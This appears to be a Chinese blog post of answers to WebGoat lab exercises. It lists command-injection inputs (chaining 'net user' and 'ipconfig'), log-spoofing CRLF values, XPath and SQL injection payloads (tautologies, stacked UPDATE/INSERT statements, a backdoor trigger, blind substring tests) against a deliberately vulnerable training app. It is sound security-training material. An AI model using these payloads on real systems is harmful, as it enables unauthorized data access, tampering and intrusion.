欢迎使用CSDN-markdown编辑器

CommandInjection(命令注入)
ep: cmd->ping www.baidu.com && net user
&& //两条命令连真执行
通过命令注入，查询网络IP地址和端口

输入“&ipconfig or net user

Numeric SQL Injection(SQL数字注入)
通过已知的数据注入 or 1=1 得到所有的数据
字符注入时一定要用单引号‘关闭

Log Spoofing(日志欺骗)
清除他们在日志中的痕迹。灰色区域代表在Web服务器的日志中的记录的内容
注入回车 ：%0d
换行 ：%0a
注入：
Tom%0d%0aLogin succeeded for username:admin

Xpath Injection(xpath注入)
尝试看到其他雇员以及他们的个人资料
万能密码，输入用户名和密码xxx’ or 1=1 or ‘a’=’a

String SQL Injection(字符串的SQL注入)
已知Smith用户，获得所有人的信息：Smith’ or ‘a’=’a–

LAB：SQL注入
Stage1:StringSQLInjection（第一阶段：字符串SQL注入）
密码处任意字符’or‘a’=’a

Stage3:NumericSQLInjection（第三阶段：数字SQL注入）
该课程的目的是通过注入语句，浏览到原本无法浏览的信息。通过一个普通员工的账户，浏览其BOSS的账户信息
101 or 1=1 order by salary desc

ModifyDatawithSQLInjection(修改数据注入)
以下表单允许用户通过userid查询自己的工资，这个表单存在SQL注入漏洞，这个课程的目的是修改jsmith的工资
jsmith’;update salaries set SALARY=’100000’ where USERID=’jsmith’;–

AddDatawithSQLInjection（添加数据注入）
jsmith’;insert into salaries(USERID,SALARY) values(‘tom’,’30000’);–

Database Backdoors(数据库后门)
它也用来作为存储的媒介。它也可以被用来作为存储恶意活动的地方，如触发器。触发器是在数据库管理系统上调用另一个数据库操作，如
insert,select,updateordelete。

你的目标是学习如何利用查询的脆弱性创建触发器。由于WebGoat使用的是mysql数据库，不支持触发器，所以该课程不会真正完成
102;update employee set Salary=’20000’
添加触发器
CREATE TRIGGER myBackDoor BEFORE INSERT ON employee FOR EACH ROW
BEGIN UPDATE employee SET email=’john@hackme.com’WHERE userid=NEW.userid

Blind Numeric SQL Injection（数字盲注）
可以由加入关键字“AND”和“OR”进行多个测试。创建一个SQL语句，您可以用来做一个真/假的测试，然后选择目标元素的第一个字符，利用>和<缩小查询范围

以下的表单允许一个用户输入一组数字并且验证正确和错误。使用这个表单在数据库上开发一个投true/false的测试
101 and （（select pin from pins where cc_number=’1111222233334444’）>2364）

Blind string SQL Injection(字符盲注)

下面的表格允许用户输入一个账号,如果它是有效的还是无效的决定。使用这种形式来开发一个真/假测试检查数据库中的其他条目。
参考Ascii值:’ A ’ = 65“Z”= 90 ’ A ’ = 97 = 122“Z”

目标是找到字段名称的值在表的行与cc_number针4321432143214321。类型为varchar字段,这是一个字符串。

把发现的名字通过教训。只有发现名字应该放入表单字段,密切关注拼写和大小写。

101 oder by 7

101 and (substring((select name from pins where cc_number=’4321432143214321’),1,1)<’J’)